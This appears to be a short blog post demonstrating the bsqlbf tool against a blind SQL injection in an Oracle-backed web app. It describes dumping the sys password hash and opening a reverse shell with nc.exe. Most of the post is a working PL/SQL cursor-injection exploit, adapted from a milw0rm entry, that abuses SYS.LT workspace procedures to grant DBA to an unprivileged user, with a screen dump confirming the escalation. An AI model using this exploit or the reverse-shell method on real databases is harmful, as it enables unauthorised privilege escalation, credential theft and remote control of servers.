Here is a small video of bsqlbf.
Here we are exploiting a blind SQL Injection in a web app with Oracle back-end. The webapp connects to the database as “scott” (unprivileged) user.
First we run bsqlbf with default parameters and find the user with whose privilege we are executing SQL (scott). Then when we try to read password hashes, the attack fails because the user scott does not have privileges to query sys.user$ table. So, we do privilege escalation with bsqlbf (type 3) and it returns password hash of sys user.
Then we execute O.S command (type 4). In this case, the database server already had a nc.exe in C:\ drive. We used this to throw us a reverse shell.
This is slightly modified version of: http://milw0rm.com/exploits/7677
This is based on cursor injection and here you do not need create function privileges:
DECLARE
D NUMBER;
BEGIN
D := DBMS_SQL.OPEN_CURSOR;
DBMS_SQL.PARSE(D,’declare pragma autonomous_transaction; begin execute immediate ”grant dba to scott”;commit;end;’,0);
SYS.LT.CREATEWORKSPACE(’a”and dbms_sql.execute(’||D||’)=1–’);
SYS.LT.COMPRESSWORKSPACETREE(’a”and dbms_sql.execute(’||D||’)=1–’);
end;
#———–screen dump—————————————————#
SQL> select * from user_role_privs;
USERNAME GRANTED_ROLE ADM DEF OS_
—————————— —————————— — — —
SCOTT CONNECT NO YES NO
SCOTT EXECUTE_CATALOG_ROLE NO YES NO
SCOTT RESOURCE NO YES NO
SQL> DECLARE
2 D NUMBER;
3 BEGIN
4 D := DBMS_SQL.OPEN_CURSOR;
5 DBMS_SQL.PARSE(D,’declare pragma autonomous_transaction; begin execute immediate ”grant dba to scott”;commit;end;’,0);
6 SYS.LT.CREATEWORKSPACE(’a”and dbms_sql.execute(’||D||’)=1–’);
7 SYS.LT.COMPRESSWORKSPACETREE(’a”and dbms_sql.execute(’||D||’)=1–’);
8 end;
9
10
11 /
DECLARE
*
ERROR at line 1:
ORA-01403: no data found
ORA-06512: at “SYS.LT”, line 6118
ORA-06512: at “SYS.LT”, line 6087
ORA-06512: at line 7
SQL> select * from user_role_privs;
USERNAME GRANTED_ROLE ADM DEF OS_
—————————— —————————— — — —
SCOTT CONNECT NO YES NO SCOTT DBA NO YES NO
SCOTT EXECUTE_CATALOG_ROLE NO YES NO
SCOTT RESOURCE NO YES NO
—
